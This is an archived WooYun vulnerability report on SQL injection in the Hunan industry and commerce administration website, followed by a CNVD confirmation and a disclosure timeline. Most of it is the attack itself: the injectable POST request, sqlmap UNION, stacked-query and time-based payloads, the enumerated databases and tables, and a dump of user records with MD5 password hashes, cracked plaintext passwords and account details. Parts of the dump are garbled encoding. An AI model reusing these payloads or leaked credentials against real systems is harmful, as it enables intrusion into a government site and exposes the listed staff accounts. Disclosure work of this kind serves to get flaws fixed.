乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-01: 细节已通知厂商并且等待厂商处理中 2015-12-04: 厂商已经确认,细节仅向厂商公开 2015-12-14: 细节向核心白帽子及相关领域专家公开 2015-12-24: 细节向普通白帽子公开 2016-01-03: 细节向实习白帽子公开 2016-01-18: 细节向公众公开
RT
0x01 漏洞位置湖南工商行政管理局
http://**.**.**.**/
0x02 漏洞描述
sql注入漏洞---泄漏大量数据库信息
POST注入0x03 测试请求参数
POST /visit/peopleandgov/a/moreQuestionList?unitecodeIndex=430000 HTTP/1.1Content-Length: 176Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://**.**.**.**:80/Cookie: JSESSIONID=38F4E74C1FFC190A395DE54C5E743C7A; pgv_pvi=5850027008; pgv_si=s6229789696; pgv_heid=1448640932500.1448640932500.1448640997914.2Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*hotkey=1&inHurdleid=-1&inPGid=0&isSearch=yes&pDateEnd=2015-10-16&pDateFrom=2015-10-16&repeatroleid=43000001&submit2=&title=Mr.
0x04 测试工具sqlmap测试即可
0x05
---Place: POSTParameter: inHurdleid Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: hotkey=1&inHurdleid=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(101)+CHAR(99)+CHAR(101)+CHAR(113)+CHAR(121)+CHAR(88)+CHAR(78)+CHAR(74)+CHAR(117)+CHAR(119)+CHAR(116)+CHAR(86)+CHAR(114)+CHAR(73)+CHAR(113)+CHAR(101)+CHAR(108)+CHAR(97)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- &inPGid=0&isSearch=yes&pDateEnd=2015-10-16&pDateFrom=2015-10-16&repeatroleid=43000001&submit2=&title=Mr. Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: hotkey=1&inHurdleid=-1'; WAITFOR DELAY '0:0:5'--&inPGid=0&isSearch=yes&pDateEnd=2015-10-16&pDateFrom=2015-10-16&repeatroleid=43000001&submit2=&title=Mr. Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: hotkey=1&inHurdleid=-1' WAITFOR DELAY '0:0:5'--&inPGid=0&isSearch=yes&pDateEnd=2015-10-16&pDateFrom=2015-10-16&repeatroleid=43000001&submit2=&title=Mr.---[02:44:12] [INFO] the back-end DBMS is Microsoft SQL Serverweb application technology: JSPback-end DBMS: Microsoft SQL Server 2008[02:44:12] [INFO] fetching database namesyou provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] Yavailable databases [10]:[*] BackupDatabase[*] EnterpriseInfo[*] master[*] MicroChatForHnaic[*] model[*] msdb[*] NewHnaicNet[*] ReportServer[*] ReportServerTempDB[*] tempdb
Database: NewHnaicNet[48 tables]+-----------------------------+| PRODUCT_CATEGORY || inputmark || sysdiagrams || tbattachment || tbblacklist || tbboard1 || tbcategory || tbcmzmmark || tbcollect || tbdatabase || tbddoslog || tbelecscreen || tbfile || tbforeignpeoplequestion || tbforeignpeoplequestiontype || tbforeignuser || tbforeignuser3 || tbgovinforpublicity || tbgroup || tbgroupboard || tbgroupcategory || tbhnaicknowledge || tbhnaicknowledge_sub || tbipunit || tbjoke || tbkeyword || tbleader || tbmessage || tbnetvoter || tbnetvoteroption || tbnews || tboperatlog || tbphonebook || tbphoto || tbplacard || tbpublic_interaction_log || tbrelationlink || tbreply || tbspecial || tbtopic || tbunit || tbunitgroup || tbuser || tbvisitanddirectvideo || tbvisitvideoquestion || tbworksystem || totalvoteforarea || vtreeoperate |+-----------------------------+
0x06 数据
Database: NewHnaicNetTable: tbuser[294 entries]+--------+---------+---------+-------------------+----------------------------------------------+------------------+---------------+----------+------------+--------------------------+-----------+------------+--------------------+----------------------+---------------------+-------------+---------------------+------------------------+----------------+------------------+| userid | groupid | usersex | username | userpswd | usersign | userociq | userfrom | usericon | useremail | usercharm | userstatus | userresult | authorunit | userregtime | userpostnum | userlogontime | userunitgroup | userexperience | usersafequestion |+--------+---------+---------+-------------------+----------------------------------------------+------------------+---------------+----------+------------+--------------------------+-----------+------------+--------------------+----------------------+---------------------+-------------+---------------------+------------------------+----------------+------------------+| 5 | 2 | 鐢 | yanhaobo | 4297F44B13955235245B2497399D7A93 (123123) | 鐣欎笅涓€鐗囩┖鐧斤紒 | 423432412 | 涓ユ旦娉 | user0.gif | hnaicfzn@**.**.**.** | 0 | 1 | 浣曚竴涓病鏈夎緭 | 婀栧崡鐪佸伐鍟嗚鏀跨鐞嗗眬 | 2010-07-16 08:46:33 | 0 | 2011-03-03 15:49:30 | 浼佷笟鐩戠潱绠$悊澶 | 0 | 浣曚竴涓病鏈夎緭 || 7 | 1 | 鐢 | hnaicfzn | 4297F44B13955235245B2497399D7A93 (123123) | 鐣欎笅涓€鐗囩┖鐧斤紒gdf | 172375281 | 鍌呭叴姹 | user0.gif | hnaicfzn@**.**.**.** | 35 | 1 | 甯偍鎵惧洖 | 婀栧崡鐪佸伐鍟嗚鏀跨鐞嗗眬 | 2010-07-16 09:13:44 | 104 | 2013-08-07 10:37:03 | 鍔炲叕瀹 | 438 | 甯偍鎵惧洖 || 10 | 2 | 鐢 | hnaicxczx | 4297F44B13955235245B2497399D7A93 (123123) | 鐣欎笅涓€鐗囩┖鐧斤紒 | 172375281 | hnaicfzn | user0.gif | werwe@**.**.**.** | 2754 | 1 | 甯偍鎵惧洖蹇樿鐨勫瘑鐮侊紒 | 闀挎矙甯傚伐鍟嗚鏀跨鐞嗗眬 | 2010-08-11 10:50:19 | 2 | 2013-09-16 09:30:48 | 鍔炲叕瀹 | 6 | 甯偍鎵惧洖蹇樿鐨勫瘑鐮侊紒 || 11 | 4 | 鐢 | qiangguoyue | 4297F44B13955235245B2497399D7A93 (123123) | 鐣欎笅涓€鐗囩┖鐧斤紒 | 54356346346 | 寮哄浗璺 | user0.gif | qiangguoyue@**.**.**.** | 0 | 1 | 6346343 | 婀栧崡鐪佸伐鍟嗚鏀跨鐞嗗眬 | 2010-10-15 13:08:15 | 0 | 2013-10-15 15:03:06 | 灞€棰嗗 | 0 | 45634634 || 12 | 2 | 鐢 | wuzuofa | 4297F44B13955235245B2497399D7A93 (123123) | 鐣欎笅涓€鐗囩┖鐧斤紒 | 34564634634 | 浼嶄綔娉 | user0.gif | xvgbxcg@**.**.**.** | 0 | 1 | gdfgdg | 婀栧崡鐪佸伐鍟嗚鏀跨鐞嗗眬 | 2010-10-15 14:34:16 | 0 | 2011-09-07 14:28:51 | 娑堣垂鑰呮潈鐩婁繚鎶ゅ锛2315鐢宠瘔涓炬姤鍔炲叕瀹わ級 | 0 | gdgdg || 13 | 2 | 鐢 | kongfanzhe | 4297F44B13955235245B2497399D7A93 (123123) | 鐣欎笅涓€鐗囩┖鐧斤紒 | 85693142 | 瀛斿嚒鍝 | user0.gif | 324233@**.**.**.** | 20767 | 1 | 6436436456dfg | 婀栧崡鐪佸伐鍟嗚鏀跨鐞嗗眬 | 2010-10-15 14:35:50 | 8 | 2013-12-23 09:56:18 | 椋熷搧娴侀€氱洃鐫g鐞嗗 | 24 | 64364363464 || 14 | 2 | 鐢 | jiangweiguo | 4297F44B13955235245B2497399D7A93 (123123) | 鐣欎笅涓€鐗囩┖鐧斤紒 | 423235235235 | 姹熷崼鍥 | user0.gif | gdfgdf@**.**.**.** | 0 | 1 | 52345234523 | 婀栧崡鐪佸伐鍟嗚鏀跨鐞嗗眬 | 2010-10-15 14:49:32 | 0 | 2011-11-14 11:25:19 | 缁忔祹淇℃伅涓績 | 0 | 2345234523523 || 15 | 2 | 鐢 | zhouxin | 4297F44B13955235245B2497399D7A93 (123123) | 鐣欎笅涓€鐗囩┖鐧斤紒 | 5345345345 | 鍛ㄦ | user0.gif | hfghgf@**.**.**.** | 53368 | 1 | 5345345 | 婀栧崡鐪佸伐鍟嗚鏀跨鐞嗗眬 | 2010-10-15 15:13:59 | 38 | 2014-10-23 12:46:49 | 鐪佸伐鍟嗗浼 | 114 | 34534534 || 16 | 1 | 鐢 | zhuxianguo | 4297F44B13955235245B2497399D7A93 (123123) | 鐣欎笅涓€鐗囩┖鐧斤紒 | 325523252 | 鏈辫搐鍥 | user0.gif | cnhklfs@**.**.**.** | 5284 | 1 | 杩樻槸娌℃湁 | 婀栧崡鐪佸伐鍟嗚鏀跨鐞嗗眬 | 2010-10-18 08:36:11 | 7 | 2014-08-12 11:25:15 | 鐪佸伐鍟嗗眬浼佷笟娉ㄥ唽灞€ | 21 | 娌℃湁 || 17 | 2 | 鐢 | libin | 6503687F60C0FC133B36460E54FCC432 | 鐣欎笅涓€鐗囩┖鐧斤紒 | 81784696 | 鏉庢枌 | user0.gif | dianyunnet@**.**.**.** | 0 | 1 | <blank> | 婀栧崡鐪佸伐鍟嗚鏀跨鐞嗗眬 | 2010-11-17 11:44:32
过滤关键词
危害等级:中
漏洞Rank:10
确认时间:2015-12-04 11:58
CNVD确认所述情况,已经转由CNCERT下发给湖南分中心,由其后续协调网站管理单位处置。
暂无